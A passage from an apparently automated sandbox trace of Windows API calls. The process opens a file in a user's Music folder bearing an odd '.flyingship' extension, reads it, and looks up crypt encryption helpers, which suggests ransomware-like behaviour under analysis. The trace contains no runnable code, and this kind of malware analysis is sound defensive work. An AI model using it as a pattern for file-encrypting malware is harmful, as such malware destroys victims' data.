Size=0x10000) returned 0xbda010 [0187.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0187.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\rrcvj.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0187.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0187.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0187.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0187.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0187.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0187.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.765] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0187.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0187.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0187.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0187.766] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0187.766] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0187.766] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0187.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0187.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0187.767] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0187.767] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0187.771] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x82d4, lpOverlapped=0x0) returned 1 [0187.772] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0187.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0187.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0187.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x182d4) returned 0xbea018 [0187.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0187.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0187.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0187.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0187.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x182d4) returned 0xa5f008 [0187.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0187.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.776] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0187.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0187.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0187.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x182d4) returned 0xbea018 [0187.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0187.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0187.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.777] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0187.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0187.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0187.777] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0187.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0187.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.777] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0187.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0187.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x182d4) returned 0xbea018 [0187.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0187.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0187.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0187.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0187.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0187.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x182d4) returned 0xa772e8 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0187.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0187.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0187.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0187.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0187.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0187.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0187.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.781] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0187.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2848 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0187.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0187.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0187.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.782] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0187.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.782] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0187.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0187.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0187.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0187.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0187.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0187.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0187.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0187.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0187.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0187.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.783] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0187.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0187.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0187.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0187.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0187.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0187.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 